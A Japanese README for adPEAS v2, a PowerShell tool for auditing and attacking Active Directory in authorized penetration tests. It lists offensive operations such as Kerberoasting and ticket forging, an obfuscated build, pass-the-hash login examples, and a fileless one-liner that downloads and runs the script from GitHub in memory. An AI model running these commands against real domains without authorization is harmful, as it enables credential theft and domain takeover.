
adPEAS v2.3.1
Active Directoryの列挙を自動化するPowershellツール。
adPEAS v2 — Active Directory 権限昇格オフェンシブスクリプト集
包括的なActive Directoryセキュリティ評価 — 依存関係ゼロ、単一ファイルですぐに利用可能。
adPEASとは?
adPEASは、Active Directory環境における設定ミス、脆弱性、権限昇格経路を特定するPowerShellベースのセキュリティ評価ツールです。RSAT、ActiveDirectoryモジュール、サードパーティ製依存関係を必要とせず、あらゆるWindowsシステムで動作する信頼性の高い自己完結型ツールを必要とするペネトレーションテスター、セキュリティ監査人、レッドチーム向けに設計されています。
adPEAS v2 は、adPEAS v1の完全な書き直しです。従来の DirectoryEntry/DirectorySearcher アプローチを、統一された System.DirectoryServices.Protocols.LdapConnection アーキテクチャに置き換え、ネイティブのKerberos認証、高度なレポート機能、オフェンシブ操作を追加しました — すべて純粋なPowerShellで実現しています。
v2の新機能
- ネイティブKerberosスタック — AS-REQ/AS-REP、TGS-REQ/TGS-REP、Pass-the-Ticket、PKINIT、すべて純粋なPowerShellで実装
- 複数の認証方式 — パスワード、NT-Hash (OPtH)、AESキー (PtK)、証明書 (PKINIT & Pass-the-Cert/Schannel)、Windows統合認証
- 9カテゴリにわたる40以上のセキュリティチェック と深刻度スコアリング
- 検索、フィルタリング、リスクスコア、ツールチップを備えた対話型HTMLレポート
- JSONエクスポート — オフラインレポート変換、段階的スキャン、スキャン比較に対応
- BloodHound CEコレクター — 攻撃経路分析用の組み込みデータ収集
- オフェンシブ操作 — Kerberoasting、AS-REP Roasting、Golden/Silver/Diamond Tickets、RBCD悪用、Shadow Credentialsなど
- セッションベースのワークフロー — 一度接続すれば、複数のチェックを対話的に実行可能
- タブ補完 — 対話的な探索のためのADオブジェクト名のオートコンプリート
adPEASは初めてですか? クイックスタートガイド を確認するか、blog.sekurity.deのブログシリーズ でアーキテクチャ、認証、内部構造の詳細をご覧ください。
機能概要
| カテゴリ | ハイライト |
|---|---|
| 認証 | 資格情報、PKINIT、Pass-the-Cert、NT-Hash、AESキー、Windows認証、Kerberos優先で自動フォールバック |
| セキュリティチェック | ドメイン設定、Kerberoast、ASREPRoast、ACL、DCSync、委任、AD CS昇格経路、GPO悪用、LAPS、BitLocker回復キー、旧式システム |
| レポート | コンソール(色分け)、プレーンテキスト、対話型HTML、JSONエクスポート |
| オフェンシブ操作 | Kerberoasting、AS-REP Roasting、Golden/Silver/Diamond Tickets、RBCD、Shadow Credentials、Pass-the-Ticket |
| BloodHound | 組み込みのBloodHound CEコレクター(ZIPエクスポート) |
| OPSECモード | アクティブなテスト(Kerberoast、ASREPRoast、BloodHound)をスキップ |
| 展開 | 単一の .ps1 ファイル、RSAT不要、外部モジュール不要、オフラインおよびエアギャップ環境で動作 |
要件
- OS: Windows 10/11、Windows Server 2016/2019/2022/2025
- PowerShell: 5.1以上 (Windows PowerShell)
- .NET Framework: 4.5以上 (Windowsに同梱)
- ネットワーク: LDAP (389)、LDAPS (636)、Kerberos (88)、SMB (445)
ActiveDirectoryモジュール、RSAT、外部PowerShellモジュールは不要です。
ダウンロード
リリースバージョン
| ファイル | サイズ | 用途 |
|---|---|---|
adPEAS.ps1 | 約4.5 MB | 開発、デバッグ、コードレビュー用 |
adPEAS_min.ps1 | 約3〜4 MB | フットプリントを抑えた通常利用向け |
adPEAS_ultra.ps1 | 約3 MB | 最小サイズ、コメントなし |
adPEAS_obf.ps1 | 1 MB未満 | 最小サイズ、転送用に難読化 |
4つのバージョンはすべて機能的に同一です。展開シナリオに応じて選択してください。
# リポジトリのクローン
git clone https://github.com/61106960/adPEAS.git
cd adPEAS
ソースからのビルド
main ブランチにはソースファイル (src/) のみが含まれています。リリースビルドは各 GitHub Release に添付されています。最新のソースからビルドする場合は、同梱のビルドスクリプトを使用してください:
git clone https://github.com/61106960/adPEAS.git
cd adPEAS
.\Build-Release.ps1
これにより、リポジトリのルートに4つのバリアント (adPEAS.ps1、adPEAS_min.ps1、adPEAS_ultra.ps1、adPEAS_obf.ps1) が生成されます。Windows PowerShell 5.1が必要で、追加の依存関係はありません。
クイックスタート
# オプション1: モジュールとしてインポート(推奨)
Import-Module .\adPEAS.ps1
# オプション2: ドットソーシング
. .\adPEAS.ps1
# オプション3: 読み込んでメモリ内で実行
Get-Content -Raw .\adPEAS.ps1 | Invoke-Expression
# オプション4: GitHubから直接メモリに読み込み(ディスク上にファイルなし)
Invoke-Expression (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS_obf.ps1" -UseBasicParsing).Content
ワンライナー (v1互換)
# ドメイン参加済みマシン(現在のユーザー)
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth
# 資格情報を使用
Invoke-adPEAS -Domain "contoso.com" -Username "john.doe" -Password "P@ssw0rd!"
# OPSECモード (Kerberoast、ASREPRoast、BloodHoundをスキップ)
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth -OPSEC
セッションベース (v2スタイル)
# 一度接続
Connect-adPEAS -Domain "contoso.com" -UseWindowsAuth
# フルスキャンを実行
Invoke-adPEAS
# または個別のチェックを実行
Get-KerberoastableAccounts
Get-ADCSVulnerabilities
Get-DangerousACLs
# 完了したら切断
Disconnect-adPEAS
認証方法
# 資格情報
Connect-adPEAS -Domain "contoso.com" -Credential (Get-Credential)
# Overpass-the-Hash (NT-Hash)
Connect-adPEAS -Domain "contoso.com" -Username "admin" -NTHash "32ED87BDB5FDC5E9CBA88547376818D4"
# Pass-the-Key (AES256)
Connect-adPEAS -Domain "contoso.com" -Username "admin" -AES256Key "4a3b2c1d5e6f..."
# PKINIT (証明書)
Connect-adPEAS -Domain "contoso.com" -Certificate "user.pfx"
# Pass-the-Cert / Schannel (LDAPS、Kerberosなし)
Connect-adPEAS -Domain "contoso.com" -Certificate "user.pfx" -PassTheCert
# LDAPS
Connect-adPEAS -Domain "contoso.com" -UseWindowsAuth -UseLDAPS
出力とレポート
# すべての形式(デフォルト) — .txt、.html、.json を作成
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth -Outputfile .\report
# HTMLのみ
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth -Outputfile .\report -Format HTML
# JSONからのオフラインレポート変換
Convert-adPEASReport -InputJson ".\report.json" -OutputPath ".\new_report"
# 2つのスキャンを比較(diffレポート)
Compare-adPEASReport -Baseline ".\scan_q1.json" -Current ".\scan_q2.json" -OutputPath ".\diff"
セキュリティチェックモジュール
| モジュール | 説明 |
|---|---|
Domain | ドメイン設定、信頼関係、パスワードポリシー、LDAP署名、SMB署名 |
Creds | Kerberoast、ASREPRoast、LAPS & BitLocker回復キーへのアクセス、SYSVOLでの資格情報露出 |
Rights | ACL、DCSync、パスワードリセット権限、危険なOU権限 |
Delegation | 非制約委任、制約付き委任、リソースベースの制約付き委任 |
ADCS | 証明書テンプレートとCA: ESC1-ESC5、ESC8、ESC9、ESC13、ESC14、ESC15 (ESC10はGPOチェック経由)。CAホストへの管理者アクセスを必要とする昇格経路は対象外です — セキュリティチェック を参照 |
Accounts | 特権アカウント、保護されたユーザー、サービスアカウント、SID履歴 |
GPO | GPO権限、ローカルグループメンバーシップ、スケジュールされたタスク、スクリプト、危険なレジストリ設定 (WDigest、AlwaysInstallElevated、OneLogon/Zerologonなど)、およびGPOを介して展開されるPoint and Printプリンタードライバーポリシー (PrintNightmare) |
Computer | LAPS、旧式システム、インフラストラクチャサーバー |
Application | Exchange、SCCM、SCOMインフラストラクチャ |
Bloodhound | BloodHound CEデータ収集 |
特定のモジュールを実行:
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth -Module Domain,Creds,ADCS
または、残りを列挙せずに一部を除外してすべて実行:
Invoke-adPEAS -Domain "contoso.com" -UseWindowsAuth -ExcludeModule Bloodhound,Computer
ドキュメント
完全なドキュメントは docs/ ディレクトリにあります:
| ドキュメント | トピック |
|---|---|
| インストール | ダウンロード、セットアップ、実行ポリシー |
| クイックスタート | 5分で始める |
| 認証 | すべての認証オプション |
| セキュリティチェック | 完全なチェックリファレンス |
| BloodHoundコレクター | BloodHound CEエクスポート |
| コア関数 | LDAPクエリ関数 |
| Set- & New-モジュール | AD変更関数 |
| ヘルパー関数 | ユーティリティ関数 |
| アーキテクチャ | 技術アーキテクチャ |
| リスクスコアリング | 深刻度とリスクスコア |
| トラブルシューティング | 一般的な問題と解決策 |
| FAQ | よくある質問 |
ブログシリーズ
adPEAS v2の内部構造を解説する詳細なブログシリーズが blog.sekurity.de で公開されています。
ライセンス
adPEASは ソース公開 です。自組織内のセキュリティ評価は無料です。商用利用(コンサルティング、MSP、有償エンゲージメント)には商用ライセンスが必要です。
完全な条件については LICENSE、商用契約については COMMERCIAL_AGREEMENT、ライセンスオプションについては PRICING を参照してください。
- ライセンスに関するお問い合わせ: [email protected]
- テクニカルサポート: [email protected]
法的通知
adPEASは 許可されたセキュリティテストのみ を目的としています。テストの前に必ず書面による許可を取得してください。所有していない、またはテストする権限のないシステムに対して決して使用しないでください。作者はこのツールの誤用について責任を負いません。適用されるすべての法律と規制を遵守してください。
著者
Alexander Sturz — SEKurity GmbH
- GitHub: @61106960
- ブログ: blog.sekurity.de